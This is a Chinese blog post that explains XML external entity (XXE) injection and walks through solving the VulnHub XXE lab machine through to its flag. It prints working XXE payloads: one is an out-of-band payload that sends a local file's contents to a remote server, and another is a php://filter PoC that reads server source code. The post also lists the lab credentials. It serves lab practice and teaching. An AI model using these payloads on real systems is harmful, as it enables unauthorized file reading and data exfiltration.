XML外部实体注入总结(XXE靶机复现)

已于 2023-07-27 11:31:24 修改
阅读量941 收藏 3
点赞数 2
分类专栏: vunlnhub靶场漏洞复现 文章标签: xml 网络 web安全 网络安全 php 安全
于 2023-07-16 22:48:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61702710/article/details/131756478
版权

1.XML外部实体注入原理

 

什么是 XML?

  • XML 指可扩展标记语言(EXtensible Markup Language)

  • XML 是一种标记语言,很类似 HTML

  • XML 的设计宗旨是传输数据,而非显示数据

  • XML 标签没有被预定义。您需要自行定义标签

  • XML 被设计为具有自我描述性

  • XML 是 W3C 的推荐标准

XML 外部实体注入的原理

服务端接收并解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入

xml外部实体注入的利用

1,使用file://或php://协议来指定本地文件系统上的资源并使其返回

2,使用http://等协议让服务器通过网络提取资源,泄露敏感信息。

3,执行SSRF类的攻击,通过XML实体注入对内网进行端口,主机等探测

4,通过无期限读取某个文件流,实施拒绝服务攻击

2.无回显XXE利用

无回显XXE指没有数据返回显示的XXE漏洞,那么该如何利用无回显XXE进行数据等泄露。

利用原理:通过外带通道提取数据,先获取目标文件的内容,然后将内容以http请求发送到数据接受的服务器上。

 payload:
  
 <?xml version="1.0"  encoding="UTF-8"?>
 <!DOCTYPE ANY[
 <!ENTITY % file SYSTEM "file///filename">
 <!ENTITY % remote SYSTEM "http://ip/test.xml">
 %remote;
 %send;
 ]>
 ​
  
 数据服务器上xml:
 <!ENTITY % all
 "<!ENTITY %#x25; send SYSTEM "http://ip/test.xml?p=%file;">"
 >
 %all;
2.Vuln-XXE靶机复现

1,通过nmap扫描ip段扫描出存货的主机,发现192.168.179.6为靶机的地址

image-20230716215716438

有两个开放端口80和5355

image-20230716215857971

2,浏览器访问192.168.238.131,访问只存在ununtu的apache2的默认界面

image-20230716220002544

3,再用dirb扫描存在的目录,发现了两个目录

image-20230716220140696

4,访问192.168.179.6/robots.txt,有发现了两个目录,但是admin.php无法访问

image-20230716220336878

5,访问192.168.179.6/xee,出现了登录页面

image-20230716220534426

6,访问靶机的/xxe路径发现存在登录,随便输入账号密码发现页面存在回显,利用burpsuite抓包查看,通过抓包发现是XML数据的提交,利用外部实体注入读取用户的账户文件,确定存在XXE漏洞

POC如下所示:

 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
 <!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
 ]>
 <root><name>&admin;</name><password>admin</password></root>

依次将所知道的站点带入:admin.php,xxe.php

xxe.php代入

image-20230716220818956

xxe.php进行base64解码

image-20230716221210118

admin.php代入

image-20230716221332796

admin.php进行base64解码

image-20230716221414348

7,从中发现了上面登录页面所需要的用户名和密码,密码要进行md5解密

用户名:administhebest 密码:admin@123

image-20230716221527884

用账号密码登录成功后发现了一个新的站点

image-20230716221633877

8,再将新发现的站点flagmeout.php代入上面poc,读出新的内容

image-20230716222647351

flagmeout.php进行base64解码

image-20230716221946233

根据返回的内容发现为base32加密,先base32解密

image-20230716222616916

再将解密内容进行base64解码

image-20230716222128224

9,又出来一个新站点/etc/.flag.php,一样代入上面poc,读出新的内容

image-20230716222324821

/etc/.flag.php进行base64解码

image-20230716222407300

解码出来发现一串类似于无字符Webshell构造的PHP内容,复制到PHP上跑一跑,应该需要PHP版本比较低,PHP7以上就跑不出来flag,这里用的是PHP5.6

所以flag是 SAFCSP{xxe_is_so_easy}

xxe靶机漏洞复现
千寻的博客
05-25 1351
0x00 XML介绍 可扩展标记语言,标准通用标记语言的子集,简称XML。 是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。 它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。 是Internet环境中跨平台的、依赖于内容的技术,也是当今处理分布式结构信息的有效工具。 早在1998年
XXE漏洞利用
weixin_45253622的博客
05-20 2216
XXE(XML外部实体注入) 漏洞介绍 漏洞复现 漏洞防御 漏洞介绍 XXE(XMLExternal Entity Injection)也就是XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml库,而libxml2.9以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持file://和ftp://等协议,导致可加载恶意外部文件和代码,造成
vulhub中Apache solr XML 实体注入漏洞复现(CVE-2017-12629)
yougexiaojiuguan的博客
04-01 875
漏洞复现过程的记录
XML实体注入漏洞
08-18 708
XML实体注入漏洞 XML实体注入漏洞    测试代码1:新建xmlget.php,复制下面代码 &lt;?php $xml=$_GET['xml']; $data = simplexml_load_string($xml); print_r($data); ?&gt; 漏洞测试利用方式1:有回显,直接读取文件 &...
xxe靶机
shy的博客
01-15 428
开始之前先回忆一下nmap 一直都知道nmap功能很强大,但是平时工作中就只用来扫描端口,渐渐的都忘记了其它的功能及使用方法,正好今天做靶场需要用nmap进行存活主机发现,总结下nmap的使用方法。 场景一:主机发现 nmap -sP 192.168.44.0/24 使用ping命令来发现存活主机 场景二:端口扫描 nmap -v -sV -p- 192.168.44.138...
XXE靶机
weixin_71053667的博客
07-25 260
扫描目录我们首先要知道该网站下有哪些页面,然后在其中找有XXE漏洞,通过御剑目录扫描来扫描目录。将发现的flagmeout.php放到xxe里找一下,右击查看源代码。指向/etc/passwd文件,发现没有。查看/var/www/html/xxe/index.php,也没有。复制后解码发现没用,继续查看admin.php。得到/etc/.flag.php,再次抓包。发送后放到php文件中运行,最终拿到。打开xxe/admin.php,在xxe界面,输入,发现回显点。点击flag,没有找到,
XXE -靶机
2201_75891821的博客
07-25 615
XXE靶机
网鼎杯2020青龙组-web
ChenZIDu的博客
05-18 1061
看来反序列化要多打点了,反序列化这块都不怎么熟~ AreUSerialz 源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "
网络安全专业名词解释
aixmmmlll的博客
05-16 4342
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1064
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
靶机xxe
weixin_43940853的博客
03-03 215
靶机主要考察的就是xxe,过程很简单,而且没有涉及提权,就走一遍流程,后面重点总结 访问admin.php显示404,访问xxe目录 发现了xml,直接xxe攻击 直接读取passwd的信息,下面以同样方法读取admin.php 解密出来登录不了,原来xxe目录下也存在这一个admin.php 将得到的字符串先base32解密 base64解密得到一个路径 解密后是一个利用自增...
Apache Solr XXE漏洞深度分析与防御实践(CVE-2017-12629)
最新发布
kp00000的博客
01-01 697
漏洞复现
XXE(XML外部实体注入)漏洞
2ed
08-01 1004
如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它 什么是XXE 简单来说,XXE全称是——XML External Entity,就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内...
XML 外部实体注入
2201_75370376的博客
06-22 1186
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
XXE靶机详解
like_niustyle的博客
09-14 726
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个少一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
渗透:vulnhub-XXE 靶机
m0_46412682的博客
09-13 1280
渗透:vulnhub-XXE 靶机 一、靶机下载 靶机XXE 下载地址: https://download.vulnhub.com/xxe/XXE.zip 二、装靶机 ①把下载好的压缩包解压到我自己的D盘:F:\虚拟机数据\XXE ②右键双击xxe.ovf-->打开方式-->VMware,存储在自己喜欢的位置 导入后,打开虚拟机 就这样,然后设置nat模式 我们这里的VM...
靶机实战XXE
TheLight9的博客
11-01 2041
下载的是一个zip压缩文件,同学们解压到自己想要放置的文件夹,这里建议大家创建一个labs文件夹,把所有的靶机ISO文件,或者是ZIP压缩包,全都放在一起,方便统一管理操作。之前查到的说是/xxe/*,这里意思就是根目录,和/xxe/admin同理,要去/xxe/flagmeout.php才可以。可以看到,用户名是administhebest,密码是md5加密过的,解密后是:admin@123。如上图,看到xml了,是不是可以尝试写一些恶意代码,来试试有没有xxe漏洞了呢?
XXE靶机实战
2401_88360043的博客
11-01 865
XXE靶机
XXE靶机实战-vuluhub系列()
PANDA墨森的博客
06-28 534
这是vulnhub靶机系列文章的第三篇,具体下载连接去vulnhub或者百度、谷歌搜搜就好...开始进入主题 首先xxexml外部实体注入漏洞,可通过进入外部实体进行攻击,例如读取敏感文件,扫描端口等等,实战中感觉出现几率不是很大,唯一一次遇到是某司面试题,当时团队小伙伴遇到了,运气爆棚的我找到了xxe漏洞,顺道内部交流了下hahaha,不扯淡了,开始吧... 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13183950.html #001寻找靶机ip ..
XML外部实体注入XXE漏洞详解
当引用本地系统文件(使用SYSTEM标识)时,XML解析器会尝试访问指定的本地路径,这可能导致安全问题,因为攻击者可能利用这一点注入恶意的外部实体引用,从而读取服务器上的敏感文件。如果引用的是公共DTD(使用...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值